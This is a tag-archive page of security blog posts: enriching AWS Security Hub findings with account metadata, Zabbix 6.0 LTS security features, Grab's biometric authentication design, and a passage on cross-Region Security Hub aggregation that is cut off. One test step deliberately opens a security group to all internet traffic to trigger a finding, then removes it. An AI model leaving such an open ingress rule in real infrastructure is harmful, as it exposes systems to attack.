Tag Archives: security

How to enrich AWS Security Hub findings with account metadata

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-enrich-aws-security-hub-findings-with-account-metadata/

In this blog post, we’ll walk you through how to deploy a solution to enrich AWS Security Hub findings with additional account-related metadata, such as the account name, the Organization Unit (OU) associated with the account, security contact information, and account tags. Account metadata can help you search findings, create insights, and better respond to and remediate findings.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, and to set up alerts, automate remediation, and export specific findings to third‑party incident management systems.

The Security or DevOps teams responsible for investigating, responding to, and remediating Security Hub findings may need additional account metadata beyond the account ID, to determine what to do about the finding or where to route it. For example, determining whether the finding originated from a development or production account can be key to determining the priority of the finding and the type of remediation action needed. Having this metadata information in the finding allows customers to create custom insights in Security Hub to track which OUs or applications (based on account tags) have the most open security issues. This blog post demonstrates a solution to enrich your findings with account metadata to help your Security and DevOps teams better understand and improve their security posture.

Solution Overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge and AWS Lambda to ingest the findings and automatically enrich them with account related metadata by querying AWS Organizations and Account management service APIs. The solution architecture is shown in Figure 1 below:

Figure 1: Solution Architecture and workflow for metadata enrichment

Figure 1: Solution Architecture and workflow for metadata enrichment

The solution workflow includes the following steps:

  1. New findings and updates to existing Security Hub findings from all the member accounts flow into the Security Hub administrator account. Security Hub generates Amazon EventBridge events for the findings.
  2. An EventBridge rule created as part of the solution in the Security Hub administrator account will trigger a Lambda function configured as a target every time an EventBridge notification for a new or updated finding imported into Security Hub matches the EventBridge rule shown below:
    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "findingEnriched": [{
              "exists": false
            }]
          }
        }
      }
    }

  3. The Lambda function uses the account ID from the event payload to retrieve both the account information and the alternate contact information from the AWS Organizations and Account management service API. The following code within the helper.py constructs the account_details object representing the account information to enrich the finding:
    def get_account_details(account_id, role_name):
        account_details ={}
        organizations_client = AwsHelper().get_client('organizations')
        response = organizations_client.describe_account(AccountId=account_id)
        account_details["Name"] = response["Account"]["Name"]
        response = organizations_client.list_parents(ChildId=account_id)
        ou_id = response["Parents"][0]["Id"]
        if ou_id and response["Parents"][0]["Type"] == "ORGANIZATIONAL_UNIT":
            response = organizations_client.describe_organizational_unit(OrganizationalUnitId=ou_id)
            account_details["OUName"] = response["OrganizationalUnit"]["Name"]
        elif ou_id:
            account_details["OUName"] = "ROOT"
        if role_name:
            account_client = AwsHelper().get_session_for_role(role_name).client("account")
        else:
            account_client = AwsHelper().get_client('account')
        try:
            response = account_client.get_alternate_contact(
                AccountId=account_id,
                AlternateContactType='SECURITY'
            )
            if response['AlternateContact']:
                print("contact :{}".format(str(response["AlternateContact"])))
                account_details["AlternateContact"] = response["AlternateContact"]
        except account_client.exceptions.AccessDeniedException as error:
            #Potentially due to calling alternate contact on Org Management account
            print(error.response['Error']['Message'])
        
        response = organizations_client.list_tags_for_resource(ResourceId=account_id)
        results = response["Tags"]
        while "NextToken" in response:
            response = organizations_client.list_tags_for_resource(ResourceId=account_id, NextToken=response["NextToken"])
            results.extend(response["Tags"])
        
        account_details["tags"] = results
        AccountHelper.logger.info("account_details: %s" , str(account_details))
        return account_details

  4. The Lambda function updates the finding using the Security Hub BatchUpdateFindings API to add the account related data into the Note and UserDefinedFields attributes of the SecurityHub finding:
    #lookup and build the finding note and user defined fields  based on account Id
    enrichment_text, tags_dict = enrich_finding(account_id, assume_role_name)
    logger.debug("Text to post: %s" , enrichment_text)
    logger.debug("User defined Fields %s" , json.dumps(tags_dict))
    #add the Note to the finding and add a userDefinedField to use in the event bridge rule and prevent repeat lookups
    response = secHubClient.batch_update_findings(
        FindingIdentifiers=[
            {
                'Id': enrichment_finding_id,
                'ProductArn': enrichment_finding_arn
            }
        ],
        Note={
            'Text': enrichment_text,
            'UpdatedBy': enrichment_author
        },
        UserDefinedFields=tags_dict
    )

    Note: All state change events published by AWS services through Amazon Event Bridge are free of cost. The AWS Lambda free tier includes 1M free requests per month, and 400,000 GB-seconds of compute time per month at the time of publication of this post. If you process 2M requests per month, the estimated cost for this solution would be approximately $7.20 USD per month.

  5. Prerequisites

    1. Your AWS organization must have all features enabled.
    2. This solution requires that you have AWS Security Hub enabled in an AWS multi-account environment which is integrated with AWS Organizations. The AWS Organizations management account must designate a Security Hub administrator account, which can view data from and manage configuration for its member accounts. Follow these steps to designate a Security Hub administrator account for your AWS organization.
    3. All the members accounts are tagged per your organization’s tagging strategy and their security alternate contact is filled. If the tags or alternate contacts are not available, the enrichment will be limited to the Account Name and the Organizational Unit name.
    4. Trusted access must be enabled with AWS Organizations for AWS Account Management service. This will enable the AWS Organizations management account to call the AWS Account Management API operations (such as GetAlternateContact) for other member accounts in the organization. Trusted access can be enabled either by using AWS Management Console or by using AWS CLI and SDKs.

      The following AWS CLI example enables trusted access for AWS Account Management in the calling account’s organization.

      aws organizations enable-aws-service-access --service-principal account.amazonaws.com

    5. An IAM role with a read only access to lookup the GetAlternateContact details must be created in the Organizations management account, with a trust policy that allows the Security Hub administrator account to assume the role.

    Solution Deployment

    This solution consists of two parts:

    1. Create an IAM role in your Organizations management account, giving it necessary permissions as described in the Create the IAM role procedure below.
    2. Deploy the Lambda function and the other associated resources to your Security Hub administrator account

    Create the IAM role

    Using console, AWS CLI or AWS API

    Follow the Creating a role to delegate permissions to an IAM user instructions to create a IAM role using the console, AWS CLI or AWS API in the AWS Organization management account with role name as account-contact-readonly, based on the trust and permission policy template provided below. You will need the account ID of your Security Hub administrator account.

    The IAM trust policy allows the Security Hub administrator account to assume the role in your Organization management account.

    IAM Role trust policy

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::<SH administrator Account ID>:root"
          },
          "Action": "sts:AssumeRole",
          "Condition": {}
        }
      ]
    }

    Note: Replace the <SH Delegated Account ID> with the account ID of your Security Hub administrator account. Once the solution is deployed, you should update the principal in the trust policy shown above to use the new IAM role created for the solution.

    IAM Permission Policy

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "account:GetAlternateContact"
                ],
                "Resource": "arn:aws:account::<Org. Management Account id>:account/o-*/*"
            }
        ]
    }

    The IAM permission policy allows the Security Hub administrator account to look up the alternate contact information for the member accounts.

    Make a note of the Role ARN for the IAM role similar to this format:

    arn:aws:iam::<Org. Management Account id>:role/account-contact-readonly. 
    			

    You will need this while the deploying the solution in the next procedure.

    Using AWS CloudFormation

    Alternatively, you can use the  provided CloudFormation template to create the role in the management account. The IAM role ARN is available in the Outputs section of the created CloudFormation stack.

    Deploy the Solution to your Security Hub administrator account

    You can deploy the solution using either the AWS Management Console, or from the GitHub repository using the AWS SAM CLI.

    Note: if you have designated an aggregation Region within the Security Hub administrator account, you can deploy this solution only in the aggregation Region, otherwise you need to deploy this solution separately in each Region of the Security Hub administrator account where Security Hub is enabled.

    To deploy the solution using the AWS Management Console

    1. In your Security Hub administrator account, launch the template by choosing the Launch Stack button below, which creates the stack the in us-east-1 Region.

      Note: if your Security Hub aggregation region is different than us-east-1 or want to deploy the solution in a different AWS Region, you can deploy the solution from the GitHub repository described in the next section.

      Select this image to open a link that starts building the CloudFormation stack

    2. On the Quick create stack page, for Stack name, enter a unique stack name for this account; for example, aws-security-hub–findings-enrichment-stack, as shown in Figure 2 below.
      Figure 2: Quick Create CloudFormation stack for the Solution

      Figure 2: Quick Create CloudFormation stack for the Solution

    3. For ManagementAccount, enter the AWS Organizations management account ID.
    4. For OrgManagementAccountContactRole, enter the role ARN of the role you created previously in the Create IAM role procedure.
    5. Choose Create stack.
    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      Figure 3 Update Management Account Role’s Trust

      Figure 3 Update Management Account Role’s Trust

    To deploy the solution from the GitHub Repository and AWS SAM CLI

    1. Install the AWS SAM CLI
    2. Download or clone the github repository using the following commands
      $ git clone https://github.com/aws-samples/aws-security-hub-findings-account-data-enrichment.git
      $ cd aws-security-hub-findings-account-data-enrichment

    3. Update the content of the profile.txt file with the profile name you want to use for the deployment
    4. To create a new bucket for deployment artifacts, run create-bucket.sh by specifying the region as argument as below.
      $ ./create-bucket.sh us-east-1

    5. Deploy the solution to the account by running the deploy.sh script by specifying the region as argument
      $ ./deploy.sh us-east-1

    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      "AWS": "arn:aws:iam::<SH Delegated Account ID>: role/<Role Name>"

    Using the enriched attributes

    To test that the solution is working as expected, you can create a standalone security group with an ingress rule that allows traffic from the internet. This will trigger a finding in Security Hub, which will be populated with the enriched attributes. You can then use these enriched attributes to filter and create custom insights, or take specific response or remediation actions.

    To generate a sample Security Hub finding using AWS CLI

    1. Create a Security Group using following AWS CLI command:
      aws ec2 create-security-group --group-name TestSecHubEnrichmentSG--description "Test Security Hub enrichment function"

    2. Make a note of the security group ID from the output, and use it in Step 3 below.
    3. Add an ingress rule to the security group which allows unrestricted traffic on port 100:
      aws ec2 authorize-security-group-ingress --group-id <Replace Security group ID> --protocol tcp --port 100 --cidr 0.0.0.0/0

    Within few minutes, a new finding will be generated in Security Hub, warning about the unrestricted ingress rule in the TestSecHubEnrichmentSG security group. For any new or updated findings which do not have the UserDefinedFields attribute findingEnriched set to true, the solution will enrich the finding with account related fields in both the Note and UserDefinedFields sections in the Security Hub finding.

    To see and filter the enriched finding

    1. Go to Security Hub and click on Findings on the left-hand navigation.
    2. Click in the filter field at the top to add additional filters. Choose a filter field of AWS Account ID, a filter match type of is, and a value of the AWS Account ID where you created the TestSecHubEnrichmentSG security group.
    3. Add one more filter. Choose a filter field of Resource type, a filter match type of is, and the value of AwsEc2SecurityGroup.
    4. Identify the finding for security group TestSecHubEnrichmentSG with updates to Note and UserDefinedFields, as shown in Figures 4 and 5 below:
      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 4: Account metadata enrichment in Security Hub finding’s Note field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Figure 5: Account metadata enrichment in Security Hub finding’s UserDefinedFields field

      Note: The actual attributes you will see as part of the UserDefinedFields may be different from the above screenshot. Attributes shown will depend on your tagging configuration and the alternate contact configuration. At a minimum, you will see the AccountName and OU fields.

    5. Once you confirm that the solution is working as expected, delete the stand-alone security group TestSecHubEnrichmentSG, which was created for testing purposes.

    Create custom insights using the enriched attributes

    You can use the attributes available in the UserDefinedFields in the Security Hub finding to filter the findings. This lets you generate custom Security Hub Insight and reports tailored to suit your organization’s needs. The example shown in Figure 6 below creates a custom Security Hub Insight for findings grouped by severity for a specific owner, using the Owner attribute within the UserDefinedFields object of the Security Hub finding.

    Figure 6: Custom Insight with Account metadata filters

    Figure 6: Custom Insight with Account metadata filters

    Event Bridge rule for response or remediation action using enriched attributes

    You can also use the attributes in the UserDefinedFields object of the Security Hub finding within the EventBridge rule to take specific response or remediation actions based on values in the attributes. In the example below, you can see how the Environment attribute can be used within the EventBridge rule configuration to trigger specific actions only when value matches PROD.

    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "Environment": "PROD"
          }
        }
      }
    }

    Conclusion

    This blog post walks you through a solution to enrich AWS Security Hub findings with AWS account related metadata using Amazon EventBridge notifications and AWS Lambda. By enriching the Security Hub findings with account related information, your security teams have better visibility, additional insights and improved ability to create targeted reports for specific account or business teams, helping them prioritize and improve overall security response. To learn more, see:

 
If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security news? Follow us on Twitter.

Siva Rajamani

Siva Rajamani

Siva Rajamani is a Boston-based Enterprise Solutions Architect at AWS. Siva enjoys working closely with customers to accelerate their AWS cloud adoption and improve their overall security posture.

Prashob Krishnan

Prashob Krishnan

Prashob Krishnan is a Denver-based Technical Account Manager at AWS. Prashob is passionate about security. He enjoys working with customers to solve their technical challenges and help build a secure scalable architecture on the AWS Cloud.

Securing Zabbix 6.0 LTS by Kārlis Saliņš / Zabbix Summit Online 2021

Post Syndicated from Kārlis Saliņš original https://blog.zabbix.com/securing-zabbix-6-0-lts-by-karlis-salins-zabbix-summit-online-2021/18962/

Security is an essential dimension of any tool in your IT infrastructure, and Zabbix is no exception. With Zabbix 6.0 LTS, our users will be able to secure their Zabbix instance on multiple layers – from encrypting your network communication to flexible user access control,  API token provisioning, and custom user password policies. Let’s take a look at the full set of security features that Zabbix 6.0 LTS provides to its users.

The full recording of the speech is available on the official Zabbix Youtube channel.

Why do we need security?

Over time the security standards for IT infrastructures and software have greatly developed. We now have a robust set of standards that we have to follow to ensure the uninterrupted and secure delivery of internal and external services. We also need to ensure that any sensitive information stays confidential and minimize the risk for any possible data breaches. In the case of Zabbix, we have the ability to define a flexible set of security measures to ensure our data stays secure:

  • We can encrypt our connections between every Zabbix component to protect our data
    • Multiple encryption methods are supported
    • Zabbix administrators can configure supported cipher suites based on their company policy
  • Role-based access enables Zabbix administrators to define a flexible set of roles to restrict access to confidential information
    • This is especially vital for multi-tenant environments, where a single Zabbix instance is shared between multiple customers
  • Audit logging adds a layer of visibility that can help us detect potential security or configuration problems before they have a real impact

Security in Zabbix

Zabbix consists of multiple components – some of which are mandatory while others are optional. In the diagram below, you can see how the connection between every component can be encrypted. Users have the ability to choose which parts of their Zabbix infrastructure should be encrypted.

In addition to encrypting the communication between all of the Zabbix components, Zabbix administrators can also create flexible user roles for granular access control. The user passwords are stored in the database, encrypted by using bcrypt. With Zabbix 6.0 LTS, we can also define Zabbix password complexity policies – I’m going to cover that specific feature a bit further in this blog post.

As for your secrets – authentication credentials for your devices, SSH usernames and passwords, and other sensitive information – these can be stored in the HashiCorp Vault, which is an optional component specifically for storing your secrets in a very secure fashion.

Zabbix user types

You can have 3 types of users in Zabbix. We need to understand the access restrictions that these user types enforce, before we can talk more about user roles:

  • Zabbix Super Admin
    • Unlimited access to everything
  • Zabbix Admin
    • Can create hosts and templates
    • Permission-based access to Zabbix entities
  • Zabbix User
    • Permission-based access to Zabbix entities
    • Has access only to the monitoring information
    • Has no access to configuration sections in Zabbix GUI

User roles can be used to create a  user role of a particular type and further restrict the access for all users that belong to this role. For example, we can have a User Role that is based on the Super Admin type but, instead of having access to every Zabbix section, we can restrict the members of this role to have access only to parts of Zabbix Administration or Configuration sections.

Obtaining API tokens

If you plan on using the Zabbix API, the first step to executing your API workflows is issuing a user.login API call and obtaining an API token, which will be used in all future API calls until the user is logged out.

Now we have a better way of generating the API tokens. You can now generate the API tokens by accessing Administration – General – API tokens. Here you can generate new API tokens, select the user who can use the particular token, and also define an expiration date for the token.

Once the token has been created, we will see a confirmation screen with the generated token information. You should copy and save the token here since you will not be able to obtain the token later! If you forget to save it, you can always generate a new token.

Below we can see a list of our API tokens, their expiration dates, names, users, and other information:

Using the API tokens is exactly the same as you would use them with the old approach. Simply place your token in the auth field of your API call and, if the token is valid and the user has the necessary permissions, the API call will succeed:

Secret macros

Macros can be used in many different parts of Zabbix – from using them in your triggers to create dynamic trigger thresholds to using them to define user names and passwords for different types of checks, such as SNMP, SSH, Zabbix agent checks, and many others. Now we can add an extra layer of obfuscation for our macros by creating secret macros:

  • The value of a secret macro is not displayed in the frontend
  • The value of a secret macro does not get cloned or exported with host/template export
  • Secret macros are stored in the Zabbix database
  • Database connections and access must be secured to prevent the potential attackers from obtaining these values

Zabbix + HashiCorp vault

 

The HashiCorp Vault is an optional component that we can use for storing Zabbix secrets, thus providing an additional layer of security. The secrets are stored in the vault, and every Zabbix reloads the Zabbix configuration cache, the secrets are picked up from the vault (every minute by default):

  • HashiCorp Vault can be used for storing secrets such as authentication information and  Zabbix database credentials
  • the HashiCorp Vault provides a unified interface to access any secret while ensuring tight access control and keeping a detailed audit log
  • Initially, the vault is sealed and must be unsealed using unseal keys
  • Secrets are stored in the Zabbix configuration cache
  • The values of secrets are retrieved on every Zabbix configuration cache update

Initially, we have to provide the vault token and vault URL in the Zabbix server configuration file. If we choose to store the Zabbix database credentials in the secret vault, we also have to provide the path to the location of the secret:

### Option: VaultToken
# Vault authentication token that should have been generated
# exclusively for Zabbix server with read only permission
VaultToken=verysecretrandomlygeneretedvaultstring

### Option: VaultURL
# Vault server HTTP[S] URL. System wide CA certificates directory
# will be used if SSLCALocation is not specified.
VaultURL=https://my.organization.vault:8200

### Option: VaultDBPath
# Vault path from where credentials for database will be retrieved
# by keys 'password' and 'username'.
VaultDBPath=my/secret/location

Security improvements in Zabbix 6.0 LTS

The security improvements that we discussed previously have been available in the previous non-LTS versions. If you’re migrating from Zabbix 5.0 LTS to Zabbix 6.0 LTS all of these will be new to you. Next, let’s cover the improvements that have been added specifically in the Zabbix 6.0 LTS. If you’re using the latest major Zabbix version –  Zabbix 5.4, then all of the following features await you in Zabbix 6.0 LTS.

Improved Audit log

The audit log has seen some major improvements. Not only is the audit log capable of logging every operation performed by the Zabbix server and Zabbix frontend, but it has also received an internal re-design to ensure minimal possible performance impact and improved UX:

  • Improved API operation logging
  • Scalability improvements when logging a large number of audit log entries
  • Quality of life improvements when it comes to filtering the audit log
  • More types of operations are now logged in the audit log
    • Script execution
    • Global macro changes
    • Changes resulting from the execution of low-level discovery rules
    • And much more

The above image shows that not only new types of operations are being logged in the audit log, but we can also see the result of those operations, such as – results of script executions, macro changes, new users being created in Zabbix, and more.

User password complexity settings

One of the major security improvements that are introduced in Zabbix 6.0 LTS is the ability to define custom password complexity requirements. Zabbix administrators can select between multiple password complexity requirements and apply them for their Zabbix instance:

  • Prevent using simple passwords like password
  • Set the minimum password length
  • Prevent the usage of  name/last name/username in the password
  • Prevent usage of easy to guess passwords, such as abcd1234, asdf1234
    • The passwords analysis is based on a dictionary of ~1 million most common passwords
  • The default Admin password on a fresh Zabbix instance is not changed – you have to update it after the new Zabbix instance is deployed!

Monitoring of certificate attributes

Another dimension of security that has improved with the release of Zabbix 6.0 LTS – security monitoring. Now we can use Zabbix Agent 2 to monitor SSL certificate attributes:

  • Zabbix Agent 2 built-in plugin for certificate monitoring available starting from Zabbix Agent 2 5.0.15
  • Collects information about the website certificate
  • Official templates are available out of the box and can be downloaded on our git page
  • web.certificate.get[hostname,<port>,<address

Below you can see an example of the certificate information obtained from the www.zabbix.com website. Here’s what the item key looks like for our example:

zabbix_agent2 -t web.certificate.get[www.zabbix.com]

And the output that is received by Zabbix:

As we can see, the resulting information tells us that the certificate is valid and has been verified successfully. Next, let’s take a look at a different kind of result:

Here we can see that the certificate is still valid, but we also receive a warning that it’s a self-signed certificate.

You may have noticed that the information obtained by this item comes in a JSON containing multiple values. That’s because most of the .get items obtain information in bulk. We can use this item as a master item and create multiple dependent items, each of which will collect an individual value. This can be configured by using JSONPath preprocessing.

Let’s take a look at some trigger examples that we can use together with the certificate monitoring item:

  • Check if the certificate is invalid
    • {HOST:cert.validation.str("invalid")} = 1
  • Check if the certificate expires in less than 7 days
    • ({HOST:cert.not_after.last()} - {HOST:cert.not_after.now ()}) / 86400 < 7
  • Check if the Certificate fingerprint has changed
    • {TEMPLATE_NAME:cert.sha1_fingerprint.diff()}=1

User permissions in service trees

With the reworked business service monitoring, we have also added the ability to define access permissions for a particular service or multiple services that have a matching tag. Permissions can be defined for Read-only access or Read-write access.

In the example below, we can see three child services. Our user has read-only access for the first two services while having read-write permissions for the third service.

If you wish to read more about the re-designed Services section and Zabbix business service monitoring, you can find a blog post based on the Zabbix Summit 2021 speech on the topic here.

Zabbix security best practices

Finally, let’s go through a checklist of best practices that will help you to secure your environment on all levels.

  • Define proper user roles for different types of Zabbix users in your organization
    • If you have a multi-tenant Zabbix environment, make sure that each tenant can access only the information related to their organization!
  • Enable HTTPS on your Zabbix web frontend
    • Unencrypted connections to the web frontend mean that an attacker could potentially obtain sensitive information
  • Encrypt your connections to the Zabbix database
  • Use the secret vault to harden your security and store your secrets in a vault
  • Encrypt the traffic between the Zabbix server, Zabbix proxies, and Zabbix agents
    • Here you can choose between PSK and Certificate-based encryptions
    • Connections between command-line tools like zabbix-sender can and should also be encrypted!
  • Agentless checks should also be configured in a secure manner
    • HTTP authentication and SSL for HTTP checks
    • Public key authentication for SSH checks
  • Define custom password complexity settings to prevent weak passwords for your Zabbix users
  • Define allow and deny lists for the item keys in your Zabbix agent configuration
    • This way you can restrict the collection of sensitive metrics by potential attackers
  • Use secret macros instead of displaying your macro values in plain-text
  • Keep Zabbix updated and update to the latest minor Zabbix release
    • Minor releases contain critical bug and security fixes
    • The upgrade process is extremely simple since no changes are made to the database schema in the minor version updates

Advanced Zabbix Security Administration course

If you wish to learn more about securing your Zabbix instance and get some practical experience in a controlled environment while being guided by Zabbix certified trainers – then the Advanced Zabbix Security Administration course is for you! In this course you will have the chance to learn and practice the following topics:

You can find more information about the Advanced Zabbix Security Administration course as well as the course pricing on the Zabbix website.

Questions

Q: Can we encrypt individual Zabbix components, or is it an all-or-nothing approach?

A: Connections between each component can be encrypted individually. You can, for example, encrypt only connections between Zabbix server and Zabbix proxies if you wish to do so. You can even leave connections between some proxies unencrypted, while others can be fully secured.

 

Q: Can I mix different Zabbix authentication approaches – for example, can I use LDAP together with internal authentication?

A: It is not only possible, but it’s also recommended. If you’re using LDAP authentication – always have a user with internal authentication configured for it. This will save you in situations where something goes wrong with the LDAP servers or connectivity.

The post Securing Zabbix 6.0 LTS by Kārlis Saliņš / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

Biometric authentication – Why do we need it?

Post Syndicated from Grab Tech original https://engineering.grab.com/biometrics-authentication

In recent years, Identity and Access Management has gained importance within technology industries as attackers continue to target large corporations in order to gain access to private data and services. To address this issue, the Grab Identity team has been using a 6-digit PIN to authenticate a user during a sensitive transaction such as accessing a GrabPay Wallet. We also use SMS one-time passwords (OTPs) to log a user into the application.

We look at existing mechanisms that Grab uses to authenticate its users and how biometric authentication helps strengthen application security and save costs. We also look at the various technical decisions taken to ensure the robustness of this feature as well as some key learnings.

Introduction

The mechanisms we use to authenticate our users have evolved as the Grab Identity team consistently refines our approach. Over the years, we have observed several things:

  • OTP and Personal Identification Number (PIN) are susceptible to hacking and social engineering.
  • These methods have high user friction (e.g. delay or failure to receive SMS, need to launch Facebook/Google).
  • Shared/rented driver accounts cause safety concerns for passengers and increases potential for fraud.
  • High OTP costs at $0.03/SMS.

Social engineering efforts have gotten more advanced – attackers could pretend to be your friends and ask for your OTP or even post phishing advertisements that prompt for your personal information.

Search data flow Search data flow
Search data flow

With more sophisticated social engineering attacks on the rise, we need solutions that can continue to protect our users and Grab in the long run.

Background

When we looked into developing solutions for these problems, which was mainly about cost and security, we went back to basics and looked at what a secure system meant.

  • Knowledge Factor: Something that you know (password, PIN, some other data)
  • Possession Factor: Something physical that you have (device, keycards)
  • Inherent Factor: Something that you are (face ID, fingerprint, voice)

We then compared the various authentication mechanisms that the Grab app currently uses, as shown in the following table:

Authentication factor 1. Something that you know 2. Something physical that you have 3. Something that you are
OTP ✔️ ✔️
Social ✔️
PIN ✔️
Biometrics ✔️ ✔️

With methods based on the knowledge and possession factors, it is still possible for attackers to get users to reveal sensitive account information. On the other hand, biometrics are something you are born with and that makes it more complex to mimic. Hence, we have added biometrics as an additional layer to enhance Grab’s existing authentication methods and build a more secure platform for our users.

Solution

Biometric authentication powered by device biometrics provides a robust platform to enhance trust. This is because modern phones provide a few key features that allow client server trust to be established:

  1. Biometric sensor (fingerprint or face ID).
  2. Advent of devices with secure enclaves.

A secure enclave, being a part of the device, is separate from the main operating system (OS) at the kernel level. The enclave is used to store private keys that can be unlocked only by the biometrics on the device.

Any changes to device security such as changing a PIN or adding another fingerprint will invalidate all prior access to this secure enclave. This means that when we enroll a user in biometrics this way, we can be sure that any payload from said device that matches the public part of said private key is authorised by the user that created it.

Search data flow
Search data flow

Architecture details

The important part of the approach lies in the enrollment flow. The process is quite simple and can be described in the following steps:

  1. Create an elevated public/private key pair that requires users authentication.
  2. Ask users to authenticate in order to prove they are the device holders.
  3. Sign payload with confirmed unlocked private key and send public key to finish enrolling.
  4. Store returned reference id in the encrypted shared preferences/keychain.
Search data flow

Implementation

The key implementation details is as follows:

  1. Grab’s HellfireSDK confirms if the device is not rooted.
  2. Uses SHA512withECDSA for hashing algorithm.
  3. Encrypted shared preferences/keychain to store data.
  4. Secure enclave to store private keys.

These key technologies allow us to create trust between devices and services. The raw biometric data stays within the device and instead sends an encrypted signature of biometry data to Grab for verification purposes.

Impact

Biometric login aims to resolve the many problems highlighted earlier in this article such as reducing user friction and saving SMS OTP costs.

We are still experimenting with this feature so we do not have insights on business impact yet. However, from early experiment runs, we estimate over 90% adoption rate and a success rate of nearly 90% for biometric logins.

Learnings/Conclusion

As methods of executing identity theft or social engineering get more creative, simply using passwords and PINs is not enough. Grab, and many other organisations, are realising that it’s important to augment existing security measures with methods that are inherent and unique to users.

By using biometrics as an added layer of security in a multi-factor authentication strategy, we can keep our users safe and decrease the probability of successful attacks. Not only do we ensure that the user is a legitimate entity, we also ensure that we protect their privacy by ensuring that the biometric data remains on the user’s device.

What’s next?

  • IdentitySDK – this feature will be moved into an SDK so other teams integrate it via plug and play.
  • Standalone biometrics – biometric authentication is currently tightly coupled with PIN i.e. biometric authentication happens in place of PIN if biometric authentication is set up. Therefore, users would never see both PIN and biometric in the same session, which limits our robustness in terms of multi-factor authentication.
  • Integration with DAX and beyond – We plan to enable this feature for all teams who need to use biometric authentication.

Join us

Grab is a leading superapp in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across over 400 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Best practices for cross-Region aggregation of security findings

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/best-practices-for-cross-region-aggregation-of-security-findings/

AWS Security Hub enables customers to have a centralized view into the security posture across their AWS environment by aggregating your security alerts from various AWS services and partner products in a standardized format so that you can more easily take action on them. To facilitate that central view, Security Hub allows you to designate an aggregation Region, which links some or all Regions to a single aggregated Region in a delegated administrator AWS account. All your findings across all of your accounts and all of your linked Regions will be processed by Security Hub in this one Region. With this feature, you can take advantage of many configurations when ingesting findings into Security Hub, that will benefit you operationally and provide cost savings.

This blog post provides you with a set of best practices when using Security Hub across multiple Regions. After implementing the recommendations in this blog post, you’ll have an optimized and centralized view of Security Hub findings from all integrated AWS services and partner products across all Regions in a single AWS account and Region.

Enable cross-Region aggregation

To enable cross-Region aggregation in Security Hub, you must first enable finding aggregation in Security Hub from the Region that will become the aggregation Region. You cannot use a Region that is disabled by default as your aggregation Region. For a list of Regions that are disabled by default, see Enabling a Region in the AWS General Reference.

You can enable AWS Security Hub finding aggregation using either the console or CLI. You must enable finding aggregation from the Region that will be the aggregation Region.

To enable Security Hub finding aggregation from the console

To enable AWS Security Hub finding aggregation using the AWS console:

  1. Start by navigating to the AWS Security Hub console and select Settings on the left side of the screen. Once on the settings page, choose the Regions tab.
Figure 1. Enabling finding aggregation

Figure 1. Enabling finding aggregation

  1. Check the checkbox to Link future Regions. As AWS releases new Regions, their results will automatically be aggregated into your designated Region. If this checkbox is not checked, any new Region that is released will not aggregate Security Hub findings to the aggregation Region.

To enable Security Hub finding aggregation using the CLI

Alternatively, you can enable AWS Security Hub finding aggregation using the CLI by using the following command:

aws securityhub create-finding-aggregator –region <aggregation Region> –region-linking-mode ALL_REGIONS | ALL_REGIONS_EXCEPT_SPECIFIED | SPECIFIED_REGIONS –regions <Region list>

Here’s a sample CLI command to enable AWS Security Hub finding aggregation:

aws securityhub create-finding-aggregator –region us-east-1 –region-linking-mode SPECIFIED_REGIONS –regions us-west-1,us-west-2

For more details around AWS Security Hub cross-region aggregation, see Aggregating findings across regions.

Consolidating downstream SIEM and ticketing integrations

Security Hub findings for all AWS accounts in your environment should be integrated into a Security Information and Event Management (SIEM) solution, such as Amazon OpenSearch Service or an APN partner SIEM, or a standardized ticketing system such as JIRA or ServiceNow.

You should send all Security Hub findings to a SIEM or ticketing solution from a single aggregation point to simplify operational overhead. Although integration architectures vary, as an example, this might mean configuring an Amazon EventBridge rule to parse and send findings to AWS Lambda or Amazon Kinesis for a custom integration point with the SIEM or ticketing solution.

You should to configure this integration point in a single delegated administrator account across all member AWS accounts and aggregated Regions. You should avoid having multiple integration points between each Security Hub Region and your SIEM or ticketing solution to avoid unnecessary operational overhead and costs of managing multiple integration points and resources required to stream findings to your SIEM.

Collecting Security Hub findings in a SIEM or ticketing solution can help you correlate findings across many other logs sources. For example, you might use a SIEM solution to analyze operating system logs from an Amazon Elastic Compute Cloud (Amazon EC2) instance to correlate with GuardDuty findings collected by Security Hub to investigate suspicious activity. You could also use ServiceNow or JIRA to create an automated, bidirectional integration between these ticketing solutions that keeps your Security Hub findings and issues in sync.

Auto-archive GuardDuty findings associated with global resources

